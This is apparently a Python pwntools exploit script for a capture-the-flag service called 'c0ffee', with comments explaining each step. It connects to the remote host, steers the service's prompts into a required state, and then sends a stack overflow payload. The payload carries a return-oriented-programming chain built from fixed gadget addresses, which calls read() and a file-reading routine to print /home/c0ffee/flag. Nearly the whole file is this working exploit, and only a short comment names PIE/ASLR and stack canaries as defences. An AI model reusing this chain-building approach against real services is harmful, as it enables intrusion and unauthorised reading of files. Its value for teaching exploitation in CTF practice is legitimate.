from pwn import *
import re
import time
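# Target binary and the fixed addresses the ROP chain in this script relies on.
# All of them are absolute 0x0804xxxx values, i.e. the binary is a 32-bit,
# non-PIE ELF; they are only meaningful for this exact build of ./c0ffee and
# would be useless against a PIE/ASLR build (which is the mitigation to apply).
binary = ELF('./c0ffee')            # was `bin`, which shadowed the builtin
data_section = 0x804B060            # writable address in the binary's image; the chain read()s the file path here
read_plt = binary.symbols['read']   # read@plt, resolved from the ELF symbol table rather than hard-coded
popret = 0x08048885                 # gadget used to discard one stack argument (see the chain below)
poppoppopret = 0x08048d50           # gadget used to discard three stack arguments
readintro = 0x80487B0               # function in the binary that the chain calls with data_section as argument
returnflag = 0x80489F5              # address the chain finally returns to
s = None                            # lazily-opened remote connection, owned by getMaximumCups()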
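def getMaximumCups():
    """Open the global connection `s` to the service and drive it into the
    state the rest of the script expects.

    After the first "cups> " prompt the script sends '1928'; the reply is
    scanned for the first integer.  The script only proceeds when that
    integer is 10 (it then answers '1'), otherwise the session is dropped
    and re-opened after a short pause (presumably the value is per
    connection — TODO confirm against the service).  If no integer is found
    an 'Error' is logged and the connection is left open.  Returns
    immediately if `s` is already set.

    Bug fix: the original retried by recursing into itself, so a long run of
    unusable sessions hit the interpreter's recursion limit; retries are now
    a loop.  The `!= None` comparison is replaced by an identity check.
    """
    global s
    if s is not None:
        return
    while True:
        s = remote('c0ffee.svattt.org', 31334)
        s.recvuntil('cups> ')
        s.sendline('1928')
        reply = s.recvuntil('cups> ')
        numbers = re.findall(r'\b\d+\b', reply)
        if not numbers:
            # Same outcome as before: log and leave the session as-is.
            log.info('Error')
            return
        if int(numbers[0]) == 10:
            s.sendline('1')
            return
        # Unusable session: drop it, clear the global and try again.
        s.close()
        s = None
        time.sleep(0.1)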
def run(payload):
    """Walk the service's prompt sequence, deliver `payload`, and return the
    service's final reply.

    Ten warm-up rounds each declare a size of 128, send 128 filler bytes,
    answer the '>> ' prompt with 8 bytes and answer '> ' with 'yes'.  The
    last round declares the exact length of `payload`, sends it, and answers
    'no'; the script then sends the path '/home/c0ffee/flag', which is the
    data the caller's chain read()s into data_section.  The three trailing
    recv() calls are timing-dependent; the last one's value is returned.
    Uses the global connection `s` opened by getMaximumCups().
    """
    def _round(size, body, answer):
        # One size/body/name/answer exchange with the service.
        s.recvuntil('size> ')
        s.sendline(size)
        s.sendline(body)
        s.recvuntil('>> ')
        s.sendline('b' * 8)
        s.recvuntil('> ')
        s.sendline(answer)

    for _ in range(10):
        _round('128', 'a' * 128, 'yes')
    _round(str(len(payload)), payload, 'no')
    s.sendline('/home/c0ffee/flag')
    s.recv()  # discarded
    s.recv()  # discarded
    return s.recv()
# ---- entry point -----------------------------------------------------------
getMaximumCups()

# Stack image delivered by run(): 20 filler bytes, then the chain (presumably
# the saved return address sits at offset 20 — not verifiable from here).
# Read as 32-bit cdecl frames, each return target followed by its arguments:
#   read(0, data_section, 17)  then poppoppopret drops the three arguments
#   readintro(data_section)    then popret drops the one argument
#   returnflag                 final return target
# The 17 bytes read() receives are the path run() sends afterwards.
# Defender's note: this chain depends on fixed addresses and on an unchecked
# overwrite reaching the return address; PIE/ASLR and a stack canary would
# each break it.
padding = 'a' * 20
flagtxt = ''.join(p32(v) for v in (
    read_plt, poppoppopret, 0, data_section, len('/home/c0ffee/flag'),
))
readfile = ''.join(p32(v) for v in (
    readintro, popret, data_section, returnflag,
))
payload = padding + flagtxt + readfile
flag = run(payload).strip('\n')
log.info('Flag: ' + flag)